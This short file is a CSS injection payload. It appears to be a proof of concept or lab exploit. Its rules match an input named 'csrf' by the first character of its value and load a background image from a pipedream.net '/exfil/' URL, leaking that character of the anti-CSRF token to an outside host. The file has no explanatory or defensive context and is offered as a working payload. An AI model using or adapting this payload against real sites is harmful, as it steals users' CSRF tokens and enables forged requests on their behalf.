input[name=csrf][value^=a]{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/exfil/a);
}
input[name=csrf][value^=b]{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/exfil/b);
}

input[name=csrf][value^=9]{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/exfil/9);   
}
